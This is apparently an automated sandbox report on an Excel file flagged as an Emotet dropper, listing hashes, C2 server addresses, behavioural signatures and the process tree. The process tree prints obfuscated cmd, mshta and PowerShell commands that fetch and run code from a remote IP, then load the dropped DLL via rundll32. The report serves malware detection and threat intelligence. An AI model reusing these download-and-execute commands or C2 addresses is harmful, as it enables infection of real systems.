Analysis

  • max time kernel
    121s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:22

General

  • Target

    tmphaf9wzce.xls

  • Size

    36KB

  • MD5

    b2ff7975fc16c578027e87cc2d63efd5

  • SHA1

    c3e163b2127f7fbf8de65045ed1e82f391e66582

  • SHA256

    aaa8079a9c9eda6f8fa98f7a71800ec53a5e639df2c8a29b376f0cc7c3bd7d40

  • SHA512

    a3b1f24c39a8b20d1c88a942681b0430ef3e4c2eae14917437ad97fa34def7e116d46aa5055417ab849650cb9db6309fc466a6f3ee2ecf24469ea192aed15f46

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tmphaf9wzce.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1140
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2228
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3580
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:4076
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ideav\gxnedmrokrvekfl.bxe",XuuCaVInfSN
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2232
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ideav\gxnedmrokrvekfl.bxe",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3712
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1440 -s 1808
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • memory/2228-301-0x0000029972FE0000-0x000002997301C000-memory.dmp
    Filesize

    240KB

  • memory/2228-314-0x0000029970E30000-0x0000029970ED0000-memory.dmp
    Filesize

    640KB

  • memory/2228-313-0x0000029973470000-0x00000299734E6000-memory.dmp
    Filesize

    472KB

  • memory/2228-330-0x0000029970E30000-0x0000029970ED0000-memory.dmp
    Filesize

    640KB

  • memory/2228-282-0x0000029972D70000-0x0000029972D92000-memory.dmp
    Filesize

    136KB

  • memory/2228-315-0x0000029970E30000-0x0000029970ED0000-memory.dmp
    Filesize

    640KB

  • memory/2432-395-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-394-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-118-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-132-0x00007FFB2DC70000-0x00007FFB2DC80000-memory.dmp
    Filesize

    64KB

  • memory/2432-121-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-120-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-119-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-397-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-124-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/2432-131-0x00007FFB2DC70000-0x00007FFB2DC80000-memory.dmp
    Filesize

    64KB

  • memory/2432-396-0x00007FFB307C0000-0x00007FFB307D0000-memory.dmp
    Filesize

    64KB

  • memory/3580-341-0x0000000000A41000-0x0000000000A64000-memory.dmp
    Filesize

    140KB

  • memory/3712-369-0x0000000004C50000-0x0000000004C77000-memory.dmp
    Filesize

    156KB

  • memory/3712-371-0x0000000004D30000-0x0000000004D57000-memory.dmp
    Filesize

    156KB

  • memory/3712-373-0x0000000004E20000-0x0000000004E47000-memory.dmp
    Filesize

    156KB

  • memory/3712-361-0x0000000000DB0000-0x0000000000DD7000-memory.dmp
    Filesize

    156KB

  • memory/3712-363-0x00000000049B0000-0x00000000049D7000-memory.dmp
    Filesize

    156KB

  • memory/3712-365-0x0000000004A90000-0x0000000004AB7000-memory.dmp
    Filesize

    156KB

  • memory/3712-367-0x0000000004B70000-0x0000000004B97000-memory.dmp
    Filesize

    156KB

  • memory/4076-349-0x0000000004860000-0x0000000004887000-memory.dmp
    Filesize

    156KB

  • memory/4076-355-0x0000000004B00000-0x0000000004B27000-memory.dmp
    Filesize

    156KB

  • memory/4076-358-0x0000000004CA0000-0x0000000004CC7000-memory.dmp
    Filesize

    156KB

  • memory/4076-353-0x0000000004AA0000-0x0000000004AC7000-memory.dmp
    Filesize

    156KB

  • memory/4076-346-0x0000000001020000-0x0000000001047000-memory.dmp
    Filesize

    156KB

  • memory/4076-351-0x0000000004A40000-0x0000000004A67000-memory.dmp
    Filesize

    156KB

  • memory/4076-344-0x00000000008A0000-0x00000000008C7000-memory.dmp
    Filesize

    156KB